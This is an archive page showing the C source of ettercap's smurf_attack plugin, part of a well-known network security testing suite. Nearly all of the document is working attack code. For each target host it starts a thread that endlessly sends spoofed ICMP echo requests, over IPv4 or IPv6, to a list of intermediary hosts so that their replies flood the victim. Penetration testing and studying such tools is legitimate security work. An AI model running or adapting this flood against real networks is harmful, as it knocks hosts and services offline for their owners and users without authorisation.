"Fossies" - the Fresh Open Source Software Archive

Member "ettercap-0.8.3.1/plug-ins/smurf_attack/smurf_attack.c" (1 Aug 2020, 3741 Bytes) of package /linux/privat/ettercap-0.8.3.1.tar.gz:

As a special service "Fossies" has tried to format the requested source page into HTML format using (guessed) C and C++ source code syntax highlighting (style: standard) with prefixed line numbers and code folding option. Alternatively you can here view or download the uninterpreted source code file. For more information about "smurf_attack.c" see the Fossies "Dox" file reference documentation and the latest Fossies "Diffs" side-by-side code changes report: 0.8.3_vs_0.8.3.1.

    1 /*
    2  *    the smurf attack plugin for ettercap
    3  *
    4  *    XXX - attack against IPv4 hosts is broken by some kernel bug
    5  *    on some systems as the kernel amends the source ip address
    6  */
    7 
    8 #include <ec.h>
    9 #include <ec_inet.h>
   10 #include <ec_plugins.h>
   11 #include <ec_send.h>
   12 #include <ec_threads.h>
   13 #include <ec_sleep.h>
   14 
   15 /* protos */
   16 int plugin_load(void *);
   17 static int smurf_attack_init(void *);
   18 static int smurf_attack_fini(void *);
   19 static EC_THREAD_FUNC(smurfer);
   20 
   21 /* globals */
   22 
   23 struct plugin_ops smurf_attack_ops = {
   24    .ettercap_version =     EC_VERSION,
   25    .name =                 "smurf_attack",
   26    .info =                 "Run a smurf attack against specified hosts",
   27    .version =              "1.0",
   28    .init =                 &smurf_attack_init,
   29    .fini =                 &smurf_attack_fini,
   30 };
   31 
   32 /* teh c0d3 */
   33 
   34 int plugin_load(void *handle)
   35 {
   36    return plugin_register(handle, &smurf_attack_ops);
   37 }
   38 
   39 static int smurf_attack_init(void *dummy)
   40 {
   41    struct ip_list *i;
   42 
   43    /* variable not used */
   44    (void) dummy;
   45 
   46    DEBUG_MSG("smurf_attack_init");
   47 
   48    if(EC_GBL_OPTIONS->unoffensive) {
   49       INSTANT_USER_MSG("smurf_attack: plugin doesn't work in unoffensive mode\n");
   50       return PLUGIN_FINISHED;
   51    }
   52 
   53    if(EC_GBL_TARGET1->all_ip && EC_GBL_TARGET1->all_ip6) {
   54       USER_MSG("Add at least one host to target one list.\n");
   55       return PLUGIN_FINISHED;
   56    }
   57 
   58    if(EC_GBL_TARGET2->all_ip && EC_GBL_TARGET2->all_ip6 && LIST_EMPTY(&EC_GBL_HOSTLIST)) {
   59       USER_MSG("Target two and global hostlist are empty.\n");
   60       return PLUGIN_FINISHED;
   61    }
   62 
   63    EC_GBL_OPTIONS->quiet = 1;
   64    INSTANT_USER_MSG("smurf_attack: starting smurf attack against the target one hosts\n");
   65 
   66    /* creating a thread per target */
   67    LIST_FOREACH(i, &EC_GBL_TARGET1->ips, next) {
   68       ec_thread_new("smurfer", "thread performing a smurf attack", &smurfer, &i->ip);
   69    }
   70 
   71    /* same for IPv6 targets */
   72    LIST_FOREACH(i, &EC_GBL_TARGET1->ip6, next) {
   73       ec_thread_new("smurfer", "thread performing a smurf attack", &smurfer, &i->ip);
   74    }
   75 
   76    return PLUGIN_RUNNING;
   77 }
   78 
   79 static int smurf_attack_fini(void *dummy)
   80 {
   81    pthread_t pid;
   82 
   83    /* variable not used */
   84    (void) dummy;
   85 
   86    DEBUG_MSG("smurf_attack_fini");
   87 
   88    while(!pthread_equal(ec_thread_getpid(NULL), pid = ec_thread_getpid("smurfer"))) {
   89       ec_thread_destroy(pid);
   90    }
   91 
   92    return PLUGIN_FINISHED;
   93 }
   94 
   95 static EC_THREAD_FUNC(smurfer)
   96 {
   97    struct ip_addr *ip;
   98    struct ip_list *i, *itmp;
   99    struct hosts_list *h, *htmp;
  100    LIST_HEAD(ip_list_t, ip_list) *ips = NULL;
  101 
  102    u_int16 proto;
  103    int (*icmp_send)(struct ip_addr*, struct ip_addr*);
  104 
  105    DEBUG_MSG("smurfer");
  106 
  107    ec_thread_init();
  108    ip = EC_THREAD_PARAM;
  109    proto = ntohs(ip->addr_type);
  110 
  111    /* some pointer magic here. nothing difficult */
  112    switch(proto) {
  113       case AF_INET:
  114          icmp_send = send_L3_icmp_echo;
  115          ips = (struct ip_list_t *)&EC_GBL_TARGET2->ips;
  116          break;
  117 #ifdef WITH_IPV6
  118       case AF_INET6:
  119          icmp_send = send_L3_icmp6_echo;
  120          ips = (struct ip_list_t *)&EC_GBL_TARGET2->ip6;
  121          break;
  122 #endif
  123       default:
  124       /* This won't ever be reached
  125        * if no other network layer protocol
  126        * is added.
  127        */
  128          ec_thread_destroy(ec_thread_getpid(NULL));
  129          break;
  130    }
  131 
  132    LOOP {
  133       CANCELLATION_POINT();
  134 
  135       /* if target two list is not empty using it */
  136       if(!LIST_EMPTY(ips))
  137          LIST_FOREACH_SAFE(i, ips, next, itmp)
  138             icmp_send(ip, &i->ip);
  139       /* else using global hostlist */
  140       else
  141          LIST_FOREACH_SAFE(h, &EC_GBL_HOSTLIST, next, htmp)
  142             if(ntohs(h->ip.addr_type) == proto)
  143                icmp_send(ip, &h->ip);
  144 
  145       ec_usleep(1000*1000/EC_GBL_CONF->sampling_rate);
  146    }
  147 
  148    return NULL;
  149 }
  150